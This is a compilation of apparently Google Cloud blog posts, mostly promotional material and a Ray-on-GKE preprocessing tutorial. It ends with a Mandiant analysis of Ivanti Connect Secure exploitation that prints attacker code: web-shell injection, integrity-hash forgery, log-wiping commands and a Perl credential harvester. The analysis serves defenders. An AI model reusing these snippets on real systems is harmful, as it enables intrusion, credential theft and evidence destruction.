There’s no place like Chrome for advanced data protection and threat intelligence: Learn how Chrome’s security features can protect your users and your organization from cyberattacks.
Dedicated security executive program
Our CISO Connect for Leaders is dedicated programming designed to equip CISOs and other security leaders with insights and strategies they need to navigate the evolving threat landscape and build a security-first culture. If you would like to be considered for participation in this executive program at Next ‘25, contact your Google Cloud account representative.
Don’t miss out
Next ‘25 is the ideal opportunity for everyone in your organization to learn about how Google Cloud can help keep them safe as they move forward in the AI era. You can also earn continuing professional education credits for your certifications.
Next ’25 will take place at the Mandalay Bay Convention Center in Las Vegas, April 9 to 11, 2025. Early bird pricing is available for $999 — but space is limited, so register soon.
Elevate your security game at Next ’25. Register today, and stay tuned for more updates and information on our security programming.
Retailers have always moved quickly to connect and match the latest merchandise with customers’ needs. And the same way they carefully design every inch of their stores, the time and thought that goes into their IT infrastructure is now just as important in the era of omnichannel shopping.
As retail organizations increasingly adopt AI foundation models and other AI technologies to improve the shopping journey, robust infrastructure becomes paramount. Retailers need to be able to develop AI applications and services quickly, reliably, robustly, and affordably, and with support from Google Cloud and NVIDIA, leading companies are already accelerating their time to market and achieving scalable costs as they move AI from pilots into production.
Google Cloud has worked with NVIDIA to empower retailers to boost their customer engagements in exciting new ways, deliver more hyper-personalized recommendations, and build their own AI applications and agents; we’ve also integrated prebuilt generative AI agents for customer service to drive immediate savings. With the NVIDIA AI Enterprise software platform available on the Google Cloud Marketplace, retailers can streamline AI development and deployment through scalable NVIDIA infrastructure running on Google Cloud.
And now, retailers can also leverage NVIDIA NIM microservices, part of NVIDIA AI Enterprise and available on Google Kubernetes Engine (GKE), to deploy generative AI models at scale, optimize inference, and handle large volumes of inquiries at reduced cost.
Retail customers and partners are combining Google Cloud with NVIDIA AI Enterprise to unlock AI transformation at scale.
Reduce Costs and Enhance Customer Satisfaction: LiveX AI stands at the cutting edge of generative AI technology, building custom, multimodal AI agents that can deliver truly human-like customer experiences. Google Cloud and LiveX AI collaborated to help jumpstart LiveX AI’s development, using Google Kubernetes Engine (GKE) and NVIDIA AI Enterprise. In a matter of three weeks, LiveX AI and Google Cloud worked together to deliver a custom solution for its client, resulting in a reduction in customer support costs by up to 85%.
“NVIDIA’s software on Google Cloud brings two of the best technology leaders together. NVIDIA’s easy-to-use NIM microservices, available on Google Cloud, are secure and reliable, and help deploy high-performance AI model inference more quickly and affordably. NVIDIA NIM microservices and GPUs on GKE accelerated LiveX AI Agent’s average answer/response generation speed by 6.1x, enabling real-time, human-like interactions for customer support, shopping assistance, and product education, boosting growth, retention and customer experience.” – Jia Li, Co-Founder, Chief AI Officer, LiveX AI
Improve responsiveness: AI techniques like text embeddings and vector databases help retailers make more relevant recommendations by using more data, but they can also slow the experience down. The in-house engineering and data science organization at a top-5 U.S. grocer collaborated with Google and NVIDIA to optimize models for better performance.
By using NVIDIA AI Enterprise software’s performance and caching improvements in its Vertex AI endpoint, the grocer cut inference time from several seconds to just 100 milliseconds — without changing the model. This now makes large-scale, real-time personalization possible. Learn more about the benefits of combining Google Cloud Vertex AI Platform and NVIDIA AI Enterprise software.
In-store analytics & innovation: AI is advancing how brick-and-mortar stores understand customer engagement, creating new opportunities to personalize the shopper journey. Standard.ai is accelerated by NVIDIA Metropolis, also available with NVIDIA AI Enterprise on the Google Cloud Marketplace, giving retailers and consumer goods companies precise visualization of customer journeys and creating actionable insights by analyzing, in real time, factors such as dwell time, shopper orientation, proximity, and engagement with products, ads, and high-impact zones.
“The NVIDIA Metropolis platform and DeepStream software development kit have enabled us to seamlessly deploy our video pipelines across Google Cloud data centers and on-prem GPUs, and, in combination with model optimizations through the NVIDIA TensorRT ecosystem of application programming interfaces, we have cut our image preprocessing time to one-third, significantly reducing our infrastructure footprint.” – David Woolard, Chief Technology Officer, Standard.ai
Accelerate AI transformation
Influenced by the rapid advancements of AI, the retail landscape is evolving faster than ever. For retailers looking to stay on the cutting edge, the collaboration between Google Cloud and NVIDIA continues to offer access to the latest in AI models, infrastructure, platforms that ensure scalability, and development tools, all in an environment that’s built on responsible AI practices and best-in-class security.
The exponential growth of machine learning models brings with it ever-increasing datasets. This data deluge creates a significant bottleneck in the Machine Learning Operations (MLOps) lifecycle, as traditional data preprocessing methods struggle to scale. The preprocessing phase, which is critical for transforming raw data into a format suitable for model training, can become a major roadblock to productivity.
To address this challenge, in this article, we propose a distributed data preprocessing pipeline that leverages the power of Google Kubernetes Engine (GKE), a managed Kubernetes service, and Ray, a distributed computing framework for scaling Python applications. This combination allows us to efficiently preprocess large datasets, handle complex transformations, and accelerate the overall ML workflow.
The data preprocessing imperative
The data preprocessing phase in MLOps is foundational, directly impacting the quality and performance of machine learning models. Preprocessing includes tasks such as data cleaning, feature engineering, scaling, and encoding, all of which are essential for ensuring that models learn effectively from the data.
When data preprocessing requires a large number of operations, it can create bottlenecks that slow down the overall speed at which data is processed. In the following example, we walk through a dataset preprocessing use case that includes uploading a large number of images to a Google Cloud Storage bucket. This involves up to 140,000 operations that, when executed serially, create a bottleneck and take over 8 hours to complete.
Dataset: For this example, we use a pre-crawled dataset consisting of 20,000 products.
Data preprocessing steps: The dataset has 15 different columns. The columns of interest are: ‘uniq_id’, ‘product_name’, ‘description’, ‘brand’, ‘product_category_tree’, ‘image’, and ‘product_specifications’.
Besides dropping null values and duplicates, we perform the following steps on the relevant columns:
description: Clean up Product Description by removing stop words and punctuation.
product_category_tree: Split into different columns.
product_specifications: Parse the Product Specifications into Key:Value pairs.
image: Parse the list of image URLs. Validate each URL and download the image.
Now, consider the scenario where a preprocessing task involves extracting multiple image URLs from each row of a large dataset and uploading the images to a Cloud Storage bucket. This might sound straightforward, but with a dataset that contains 20,000+ rows, each with potentially up to seven URLs, the process can become incredibly time-consuming when executed serially in Python. In our experience, such a task can take upwards of eight hours to complete!
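To make the bottleneck concrete, here is a minimal sketch of the serial approach, with a hypothetical bucket name and input file; every image is fetched and uploaded one at a time on a single thread, which is why the job stretches into hours. The ‘image’ and ‘uniq_id’ column names come from the dataset described above.
import pandas as pd
import requests
from google.cloud import storage

bucket = storage.Client().bucket("my-preprocessing-bucket")  # hypothetical bucket

df = pd.read_csv("products.csv")  # hypothetical file name; ~20,000 rows
for _, row in df.iterrows():
    # Each row can carry up to seven image URLs, processed strictly one at a time.
    for url in str(row["image"]).strip("[]").replace('"', "").split(","):
        url = url.strip()
        if url:
            resp = requests.get(url, timeout=10)
            if resp.ok:
                name = f"images/{row['uniq_id']}/{url.split('/')[-1]}"
                bucket.blob(name).upload_from_string(resp.content)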
Solution: Implement parallelism for scalability
To tackle this scalability issue, we turn to parallelism. By breaking the dataset into smaller chunks and distributing the processing across multiple threads, we can drastically reduce the overall execution time. We chose to use Ray as our distributed computing platform.
Ray: Distributed computing simplified
Ray is a powerful framework designed for scaling Python applications and libraries. It provides a simple API for distributing computations across multiple workers, making it a strong choice for implementing parallel data preprocessing pipelines.
In our specific use case, we leverage Ray to distribute the Python function responsible for downloading images from URLs to Cloud Storage buckets across multiple Ray workers. Ray’s abstraction layer handles the complexities of worker management and communication, allowing us to focus on the core preprocessing logic.
Ray’s core capabilities include:
Task parallelism: Ray enables arbitrary functions to be executed asynchronously as tasks on separate Python workers, providing a straightforward way to parallelize our image download process.
Actor model: Ray’s “actors” offer a way to encapsulate stateful computations, making them suitable for complex preprocessing scenarios where shared state might be necessary.
Simplified scaling: Ray seamlessly scales from a single machine to a full-blown cluster, making it a flexible solution for varying data sizes and computational needs.
Implementation details
We ran the data preprocessing on GKE using the accelerated platforms repository, which provides the code to build your GKE cluster and configure prerequisites, such as running Ray on the cluster, so you can run the data preprocessing job on the cluster as a container. The job consisted of three phases:
1. Dataset partitioning: We divide the large dataset into smaller chunks.
The 20,000 rows of input data were divided into 101 smaller chunks, each with 199 rows. Each chunk is assigned to a Ray task, which is executed on a Ray worker.
2. Ray task distribution: We created Ray remote tasks. Ray creates and manages the workers and distributes the tasks across them.
3. Parallel data processing: The Ray tasks prepare the data and download the images to Cloud Storage concurrently.
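Below is a minimal sketch of the same image-download step distributed with Ray; the chunking and task fan-out mirror the three phases above. It assumes ray, pandas, requests, and google-cloud-storage are installed and that ray.init() can reach the Ray cluster running on GKE; the bucket and file names are hypothetical.
import ray
import pandas as pd
import requests
from google.cloud import storage

ray.init()  # on GKE, this connects to the Ray cluster set up on the GKE cluster

@ray.remote
def process_chunk(rows: pd.DataFrame) -> int:
    """Download every image URL in one chunk and upload it to Cloud Storage."""
    bucket = storage.Client().bucket("my-preprocessing-bucket")  # hypothetical bucket
    uploaded = 0
    for _, row in rows.iterrows():
        for url in str(row["image"]).strip("[]").replace('"', "").split(","):
            url = url.strip()
            if not url:
                continue
            resp = requests.get(url, timeout=10)
            if resp.ok:
                name = f"images/{row['uniq_id']}/{url.split('/')[-1]}"
                bucket.blob(name).upload_from_string(resp.content)
                uploaded += 1
    return uploaded

# Phase 1: partition the dataset into ~200-row chunks.
df = pd.read_csv("products.csv")  # hypothetical file name
chunks = [df.iloc[i:i + 199] for i in range(0, len(df), 199)]

# Phases 2 and 3: fan the chunks out as Ray tasks; Ray schedules them across the workers.
futures = [process_chunk.remote(chunk) for chunk in chunks]
print("Images uploaded:", sum(ray.get(futures)))
Because each Ray task owns its own chunk, the download and upload work proceeds concurrently across workers instead of sequentially on a single machine.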
Results
By leveraging Ray and GKE, we achieved a dramatic reduction in processing time. The preprocessing time for 20,000 rows decreased from over 8 hours to just 17 minutes, representing a speedup of approximately 23x. If the data size increases, you can adjust the batch size and use Ray autoscaling to achieve similar performance.
Data preprocessing challenges no more
Distributed data preprocessing with GKE and Ray provides a robust and scalable solution for addressing the data preprocessing challenges faced by modern ML teams. By leveraging the power of parallelism and cloud infrastructure, we can accelerate data preparation, reduce bottlenecks, and empower data scientists and ML engineers to focus on model development and innovation. To learn more, run the deployment that demonstrates this data preprocessing use case using Ray on GKE cluster.
To help close this gender gap, we are opening up applications for the Google for Startups Accelerator: Women Founders program for Europe & Israel. This ten-week accelerator is designed to support Seed to Series A women-led AI startups with expert mentorship, technical support, and tailored workshops that lay the groundwork for scaling.
Fostering a more inclusive AI ecosystem
As AI continues to revolutionize industries, ensuring that diverse voices lead the way is critical for driving innovation that benefits everyone. The Google for Startups Accelerator: Women Founders program is working to level the playing field, empowering women-led startups to bring fresh, diverse perspectives to the future of AI.
Margaryta Sivakova, the CEO of Legal Nodes, leveraged support from the program to scale her business: “Through Google for Startups Accelerator, we learned to build, improve, and scale AI solutions, focusing on production-grade AI, MLOps, and the right infrastructure for rapid scaling.”
Maria Terzi, the CEO of Malloc Privacy, received one-on-one support to help users protect the data on their phones: “We joined Google for Startups Accelerator to enhance our technology and gained much more—insights on pricing, sales, UI/UX design, people management, and fast-paced operations.”
Apply now
Women-led startups building with AI in Europe and Israel can apply until January 24 for the 2025 cohort of the Google for Startups Accelerator: Women Founders program.
Written by: John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson
Note: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more indicators, detections, and information to this blog post as needed.
On Wednesday, Jan. 8, 2025, Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. CVE-2025-0282 is an unauthenticated stack-based buffer overflow. Successful exploitation could result in unauthenticated remote code execution, leading to potential downstream compromise of a victim network.
Ivanti and its affected customers identified the compromise based on indications from the company-supplied Integrity Checker Tool (“ICT”) along with other commercial security monitoring tools. Ivanti has been working closely with Mandiant, affected customers, government partners, and security vendors to address these issues. As a result of their investigation, Ivanti has released patches for the vulnerabilities exploited in this campaign and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Mandiant is currently performing analysis of multiple compromised Ivanti Connect Secure appliances from multiple organizations. The activity described in this blog utilizes insights collectively derived from analysis of these infected devices; we have not yet conclusively tied all of the activity described below to a single actor. In at least one of the appliances undergoing analysis, Mandiant observed the deployment of the previously observed SPAWN ecosystem of malware (which includes the SPAWNANT installer, SPAWNMOLE tunneler, and the SPAWNSNAIL SSH backdoor). The deployment of the SPAWN ecosystem of malware following the targeting of Ivanti Connect Secure appliances has been attributed to UNC5337, a cluster of activity assessed with moderate confidence to be part of UNC5221, which is further described in the Attribution section.
Mandiant has also identified previously unobserved malware families from additional compromised appliances, tracked as DRYHOOK and PHASEJAM, which are not yet linked to a known group.
It is possible that multiple actors are responsible for the creation and deployment of these various code families (i.e. SPAWN, DRYHOOK and PHASEJAM), but as of publishing this report, we don’t have enough data to accurately assess the number of threat actors targeting CVE-2025-0282. As additional insights are gathered, Mandiant will continue to update this blog post.
Exploitation
While CVE-2025-0282 affects multiple patch levels of ICS release 22.7R2, successful exploitation is version specific. Prior to exploitation, repeated requests to the appliance have been observed, likely to determine the version prior to attempting exploitation.
Version detection has been observed using the Host Checker Launcher, shown above, and the different client installers to determine the version of the appliance. HTTP requests from VPS providers or Tor networks to these URLs, especially in sequential version order, may indicate pre-exploitation reconnaissance.
While there are several variations in the exploitation of CVE-2025-0282, the exploit and script generally perform the following steps:
Disable SELinux
Prevent syslog forwarding
Remount the drive as read-write
Write the script
Execute the script
Deploy one or more web shells
Use sed to remove specific log entries from the debug and application logs
Reenable SELinux
Remount the drive
Immediately after exploitation the threat actor disables SELinux, uses iptables to block syslog forwarding, and remounts the root partition to enable writing of malware to the appliance.
setenforce 0
iptables -A OUTPUT -p udp --dport 514 -j DROP
iptables -A OUTPUT -p tcp --dport 514 -j DROP
iptables -A OUTPUT -p udp --dport 6514 -j DROP
iptables -A OUTPUT -p tcp --dport 6514 -j DROP
mount -o remount,rw /
Malware Staging
Mandiant observed the threat actor using the shell script to echo a Base64-encoded script into /tmp/.t, and then set execution permissions on the file. The figure below shows the contents of /tmp/.t.
Next, the threat actor writes a Base64-encoded ELF binary into /tmp/svb. The ELF binary first uses setuid to set the owner of the process to root. It then executes /tmp/s (PHASEJAM), which inherits the root privileges of the parent process. The threat actor then uses dd to overwrite the svb file with zeros, and removes /tmp/.t.
PHASEJAM is a dropper written as a bash shell script that maliciously modifies Ivanti Connect Secure appliance components. The primary functions of PHASEJAM are to insert a web shell into the getComponent.cgi and restAuth.cgi files, block system upgrades by modifying the DSUpgrade.pm file, and overwrite the remotedebug executable so that it can be used to execute arbitrary commands when a specific parameter is passed.
Web Shell
PHASEJAM inserts the web shell into the legitimate files getComponent.cgi and restAuth.cgi as a function named AccessAllow(). The web shell is Perl-based and provides the threat actor with remote access and code execution capabilities on the compromised ICS server. It utilizes the MIME::Base64 module to encode and decode commands and data.
The following summarizes the web shell’s functionality, accessible via specific commands derived from HTTP query parameters:
Command 1: Decodes the code provided in the HTTP_CODE environment variable and writes the result into a file named test.p under the /tmp directory. Executes the file using /bin/bash and returns the output of the command execution to the attacker.
Command 2: Similar to command 1, but executes the provided commands using /home/bin/dsrunpriv and the patched remotedebug file.
Command 3: Writes a file with a name specified in the HTTP_CODE environment variable under the /tmp directory, with content provided in the License parameter. This functionality allows the attacker to upload arbitrary files on the compromised appliance.
Command 4: Reads the content of a file specified in the Base64-decoded HTTP_CODE environment variable and returns the content to the attacker. This enables the attacker to exfiltrate data from the affected appliance.
Command 5: Similar to command 3, but overwrites the target file instead of appending to it, in case it already exists on the appliance.
Blocked and Simulated Upgrades
To intercept upgrade attempts and simulate an upgrade, PHASEJAM injects a malicious function into the /home/perl/DSUpgrade.pm file named processUpgradeDisplay(). The functionality is intended to simulate an upgrading process that involves thirteen steps, with each of those taking a predefined amount of time. If the ICS administrator attempts an upgrade, the function displays a visually-convincing upgrade process that shows each of the steps along with various numbers of dots to mimic a running process. Further details are provided in the System Upgrade Persistence section.
remotedebug Hooking
PHASEJAM renames the file /home/bin/remotedebug to remotedebug.bak. PHASEJAM writes a new /home/bin/remotedebug shell script to hook calls to remotedebug. The brief shell script checks for a new -c parameter that allows remote code execution by the web shell. All other parameters are passed through to remotedebug.bak.
The following provides an abridged PHASEJAM Sample:
# create backdoor 1
cp /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/webserver/htdocs/dana-na/jam/getComponent.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/jam/getComponent.cgi
sh=$(echo CnN1YiB...QogICAK|base64 -d)
up=$(echo CnN1YiB...xuIjsKCn0K |base64 -d)
grep -q 'sub AccessAllow()' || echo "$sh" >>
/home/webserver/htdocs/dana-na/jam/getComponent.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/etc/manifest/manifest -a |grep
-oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/webserver/htdocs/dana-na/jam/getComponent.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# create backdoor 2
cp /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/webserver/htdocs/dana-na/auth/restAuth.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/auth/restAuth.cgi
grep -q 'sub AccessAllow()' echo "$sh" >>
/home/webserver/htdocs/dana-na/auth/restAuth.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl
dgst -sha256 /home/webserver/htdocs/dana-na/auth/restAuth.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# remotedebug
cp -f /home/bin/remotedebug /home/bin/remotedebug.bak
echo IyEvYmluL2Jhc2gKaWYgWyAiJDEiID09ICItYyIgXTsgdGhlbgoJYm
FzaCAiJEAiCmVsc2UKCWV4ZWMgL2hvbWUvYmluL3JlbW90ZWRlYnV
nLmJhayAiJEAiCmZpICAK|base64 -d >/home/bin/remotedebug
chmod 777 /home/bin/remotedebug.bak
sed -i "s/$(grep /home/bin/remotedebug /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/bin/remotedebug |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
# upgrade
cp -f /home/perl/DSUpgrade.pm /home/perl/DSUpgrade.pm.bak
sed -i 's/popen(*FH, $prog);/processUpgradeDisplay($prog,
$console, $html);return 0;popen(*FH, $prog);/g'
/home/perl/DSUpgrade.pm
grep -q 'sub processUpgradeDisplay()' || echo "$up" >>
/home/perl/DSUpgrade.pm
sed -i "s/$(grep /home/perl/DSUpgrade.pm /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
pkill cgi-server
Anti-Forensics
Following exploitation, the threat actor has been observed removing evidence of exploitation from several key areas of the appliance:
Clearing kernel messages using dmesg and removing entries from the debug logs that are generated during the exploit
Deleting troubleshoot information packages (state dumps) and any core dumps generated from process crashes
Removing application event log entries related to syslog failures, internal ICT failures, crash traces, and certificate handling errors
Removing executed commands from the SELinux audit log
dmesg -C
cd /data/var/dlogs/
sed -i '/segfault/d' debuglog
sed -i '/segfault/d' debuglog.old
sed -i '/SystemError/d' debuglog
sed -i '/SystemError/d' debuglog.old
sed -i '/ifttls/d' debuglog
sed -i '/ifttls/d' debuglog.old
sed -i '/main.cc/d' debuglog
sed -i '/main.cc/d' debuglog.old
sed -i '/SSL_read/d' debuglog
sed -i '/SSL_read/d' debuglog.old
sed -i '/tlsconnectionpoint/d' debuglog
sed -i '/tlsconnectionpoint/d' debuglog.old
rm -rf /data/var/statedumps/*
rm -rf /data/var/cores/*
cd /home/runtime/logs
sed -i 's/[^\x00]{1}\x00[^\x00]*web server[^\x00]*\x00//g' log.events.vc0
sed -i 's/[^\x00]{1}\x00[^\x00]*AUT24604[^\x00]*\x00//g' log.events.vc0
sed -i 's/[^\x00]{1}\x00[^\x00]*SYS31048[^\x00]*\x00//g' log.events.vc0
sed -i 's/[^\x01]{1}\x01[^\x01]*SYS31376[^\x01]*\x01//g' log.events.vc0
sed -i 's/\x01[^\x01]{2,3}6[^\x01]*ERR10073[^\xff]*\x09[^\x01]{1}\x01/\x01/g' log.events.vc0
cd /data/var/log/audit/
sed -i '/bin\/web/d' audit.log
sed -i '/setenforce/d' audit.log
sed -i '/mount/d' audit.log
sed -i '/bin\/rm/d' audit.log
System Upgrade Persistence
Mandiant identified two techniques the threat actor employed to persist across system upgrades on compromised Ivanti Connect Secure appliances.
Fake System Upgrades
The first technique, utilized by PHASEJAM, prevents legitimate ICS system upgrade attempts by administrators by rendering a fake HTML upgrade progress bar while silently blocking the legitimate upgrade process. Because the upgrade is blocked, the technique allows any installed backdoors or tools left by the threat actor to persist on the currently running version of the VPN while giving the appearance of a successful upgrade.
First, the threat actor uses sed to insert malicious Perl code into DSUpgrade.pm to modify the behavior of the system upgrade process. The malicious processUpgradeDisplay() function, which is stored in the shell variable $up, is appended to DSUpgrade.pm.
The modification occurs within a function in DSUpgrade.pm responsible for installing the new upgrade package. The inserted call to processUpgradeDisplay() with the early return makes the legitimate popen() call to execute /pkg/dspkginstall unreachable. The following provides the relevant excerpt from DSUpgrade.pm as a result of the modification.
local *FH;
my $prog = "/pkg/dspkginstall /var/tmp/new-pack.tgz";
if (defined $useUpgradePartition && $useUpgradePartition == 1) {
$prog = "/pkg/dspkginstall /data/upgrade/new-pack.tgz";
}
processUpgradeDisplay($prog, $console, $html);
return 0;
popen(*FH, $prog);
The modification intercepts the standard upgrade flow by calling the maliciously created processUpgradeDisplay() function before the legitimate upgrade command executes. The inserted processUpgradeDisplay() function displays a fake HTML upgrade progress bar, using the sleep command to add dots every second to mimic a running process.
Recent versions of Ivanti Connect Secure have a built-in integrity checker tool (ICT) that periodically scans the file system to detect new or modified system files that may be indicative of system compromise. The ICT uses a manifest during its scanning process, containing a list of the expected file paths on the system along with their expected SHA256 hashes. In an attempt to circumvent the ICT scanner, the threat actor recalculates the SHA256 hash of the modified DSUpgrade.pm and inserts it into the manifest.
sed -i "s/$(grep /home/perl/DSUpgrade.pm
/home/etc/manifest/manifest -a |grep -oE
'[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
The threat actor copies the VERSION file from the mounted upgrade partition (tmp/root/home/VERSION) to the current version partition (/home/VERSION). As a result, the system falsely indicates a successful upgrade while continuing to run on the old appliance version.
SPAWNANT and its supporting components can persist across system upgrades. It hijacks the execution flow of dspkginstall, a binary used during the system upgrade process, by exporting a malicious snprintf function containing the persistence mechanism.
Unlike the first method described in this blog post for system upgrade persistence, SPAWNANT does not block the upgrade process. It survives the upgrade process by ensuring itself and its components are migrated to the new upgrade partition (mounted on /tmp/data/ during a legitimate system upgrade process).
SPAWNANT sets the LD_PRELOAD environment variable to itself (libupgrade.so) within DSUpgrade.pm on the upgrade partition. The modification tells the dynamic linker to load libupgrade.so and use SPAWNANT’s malicious exported snprintf function before other libraries.
ENV{"LD_PRELOAD"} = "libupgrade.so"
Next, SPAWNANT establishes an additional method of backdoor access by writing a web shell into compcheckresult.cgi on the upgrade partition. The web shell uses system() to execute the value passed to a hard-coded query parameter.
Throughout this entire process, SPAWNANT is careful to circumvent the ICT by recalculating the SHA256 hash for any maliciously modified files. Once the appropriate modifications are complete, SPAWNANT generates a new RSA key pair to sign the modified manifest.
After the threat actor established an initial foothold on an appliance, Mandiant observed a number of different tunnelers, including publicly available and open-source tunnelers, designed to facilitate communication channels between the compromised appliance and the threat actor's command and control infrastructure. These tunnelers allowed the attacker to bypass network security controls and may enable lateral movement further into a victim environment.
SPAWNMOLE
Originally reported in Cutting Edge, Part 4, SPAWNMOLE is a tunneler injected into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. SPAWNMOLE is activated when it detects a specific series of magic bytes. Otherwise, the remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer.
LDAP Queries
The threat actor used several tools to perform internal network reconnaissance, including built-in tools on the ICS appliance such as nmap and dig to determine what can be accessed from the appliance. The threat actor has also been observed using the LDAP service account, if configured, from the ICS appliance to perform LDAP queries. The LDAP service account was also used to move laterally within the network, including to Active Directory servers, through SMB or RDP.
LDAP queries were executed using /tmp/lmdbcerr, with output directed to randomly named files in the /tmp directory. Password, host, and query were passed as command line arguments.
Mandiant has observed the threat actor archiving the database cache on a compromised appliance and staging the archived data in a directory served by the public-facing web server to enable exfiltration of the database. The database cache may contain information associated with VPN sessions, session cookies, API keys, certificates, and credential material.
The threat actor archives the contents of /runtime/mtmp/lmdb. The resulting tar archive is then renamed to masquerade as a CSS file located within /home/webserver/htdocs/dana-na/css/.
Ivanti has previously published guidance on remediating the risk that may result from the database cache dump. This includes resetting local account credentials, resetting API keys, and revoking certificates.
Credential Harvesting
Mandiant has observed the threat actor deploying a Python script, tracked as DRYHOOK, to steal credentials. The malware is designed to modify a system component named DSAuth.pm that belongs to the Ivanti Connect Secure environment in order to harvest credentials from successful authentications.
Upon execution, the malicious Python script opens /home/perl/DSAuth.pm and reads its content into a buffer. Next, the malware uses regular expressions to find and replace specific blocks of code.
The original *setPrompt definition is replaced with the following Perl code:
# *setPrompt
$ds_g="";
sub setPrompt{
eval{
my $res=@_[1]."=".@_[2]."\n";
$ds_g .= $res;
};
return DSAuthc::RealmSignin_setPrompt(@_);
}
$ds_e="";
The injected setPrompt routine captures the second and the third parameter, combines them into the format <param2>=<param3> and then assigns the produced string to a global variable named $ds_g. The next replacement, shown as follows, reveals that the second parameter is a username, and the third parameter is the password of a user trying to authenticate.
# *runSignin = *DSAuthc::RealmSignin_runSignin;
$ds_g1="";
sub encode_base64 ($;$)
{
my $res = "";
my $eol = $_[1];
$eol = "n" unless defined $eol;
pos($_[0]) = 0; # ensure start at the beginning
$res = join '', map( pack('u',$_)=~ /^.(S*)/, ($_[0]=~/(.{1,45})/gs));
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
return $res;
}
sub runSignin{
my $res=DSAuthc::RealmSignin_runSignin(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."\n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e1="";
The code above contains two subroutines named encode_base64 and runSignin. The former takes a string and Base64-encodes it, while the latter intercepts the sign-in process and, upon a successful attempt, writes the credentials saved in the global variable $ds_g to a file named cmdmmap.kuwMW under the /tmp directory. The <username>=<password> string is first RC4-encrypted with a hard-coded key and then Base64-encoded with the encode_base64 routine before being saved into the cmdmmap.kuwMW file.
The last code replacement is shown as follows, and it is the same code as above, but it targets a different sign-in scheme that is named EBSL in the code.
# *runSigninEBSL
$ds_g2="";
sub runSigninEBSL{
my $res=DSAuthc::RealmSignin_runSigninEBSL(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
use Crypt::RC4;
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."\n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e2="";
After the changes are made, the malware attempts to write the modified content back to the DSAuth.pm file; if unsuccessful, it remounts the file system as read-write, writes the file, and then mounts the file system as read-only again. Finally, all instances of the cgi-server process are killed in order for the modified DSAuth.pm to be activated.
Attribution
Mandiant has previously only observed the deployment of the SPAWN ecosystem of malware on Ivanti Connect Secure appliances by UNC5337. UNC5337 is a China-nexus cluster of espionage activity including operations that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024 and most recently as Dec. 2024. This included the Jan 2024 exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) to compromise Ivanti Connect Secure appliances. UNC5337 then leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is part of UNC5221.
UNC5221 is a suspected China-nexus espionage actor that exploited vulnerabilities CVE-2023-46805 and CVE-2024-21887, which impacted Ivanti Connect Secure VPN and Ivanti Policy Secure appliances, as early as December 2023. Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, including the ZIPLINE passive backdoor, THINSPOOL dropper, LIGHTWIRE web shell, and WARPWIRE credential harvester. UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity. Additionally, Mandiant previously observed UNC5221 leveraging a likely ORB network of compromised Cyberoam appliances to enable intrusion operations.
Conclusion
